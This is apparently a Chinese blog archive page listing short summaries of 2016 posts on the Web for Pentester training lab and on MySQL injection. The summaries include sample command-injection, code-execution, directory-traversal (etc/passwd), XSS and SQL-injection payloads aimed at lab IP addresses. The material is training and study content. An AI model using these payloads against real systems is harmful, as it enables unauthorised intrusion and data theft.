2016年7月21日
【渗透测试学习平台】 web for pentester -6.命令执行
摘要: 命令执行漏洞 windows支持: | ping 127.0.0.1|whoami || ping 2 || whoami (哪条名令为真执行那条) & && ping 127.0.0.1&&whoami Linux支持: ; 127.0.0.1;whoami | 127.0.0.1|whoami 阅读全文
posted @ 2016-07-21 16:59 Bypass 阅读(1111) 评论(0) 推荐(0)
【渗透测试学习平台】 web for pentester -5.代码执行
摘要: Example 1 http://192.168.106.154/codeexec/example1.php?name=".system('uname -a');// Example 2 http://192.168.106.154/codeexec/example2.php?order=id);} 阅读全文
posted @ 2016-07-21 16:58 Bypass 阅读(760) 评论(0) 推荐(0)
【渗透测试学习平台】 web for pentester -4.目录遍历
摘要: Example 1 http://192.168.106.154/dirtrav/example1.php?file=../../../../../../../etc/passwd Example 2 http://192.168.106.154/dirtrav/example2.php?file= 阅读全文
posted @ 2016-07-21 16:41 Bypass 阅读(761) 评论(0) 推荐(0)
【渗透测试学习平台】 web for pentester -3.XSS
摘要: Example 1 http://192.168.91.139/xss/example1.php?name=hacker<script>alert('xss')</script> Example 2 http://192.168.91.139/xss/example2.php?name=hacker 阅读全文
posted @ 2016-07-21 16:39 Bypass 阅读(1143) 评论(0) 推荐(0)
【渗透测试学习平台】 web for pentester -2.SQL注入
摘要: Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/example1.php?name=root' and 1=1%23 http://192.168.9 阅读全文
posted @ 2016-07-21 15:13 Bypass 阅读(6475) 评论(0) 推荐(0)
【渗透测试学习平台】 web for pentester -1.介绍与安装
摘要: web for pentester是国外安全研究者开发的的一款渗透测试平台,通过该平台你可以了解到常见的Web漏洞检测技术。 官网:https://www.pentesterlab.com 下载地址:https://www.pentesterlab.com/exercises/web_for_pen 阅读全文
posted @ 2016-07-21 15:12 Bypass 阅读(4039) 评论(2) 推荐(0)
Mysql 下 Insert、Update、Delete、Order By、Group By注入
摘要: Insert: 语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....) 报错注入: insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e 阅读全文
posted @ 2016-07-21 10:06 Bypass 阅读(1857) 评论(0) 推荐(0)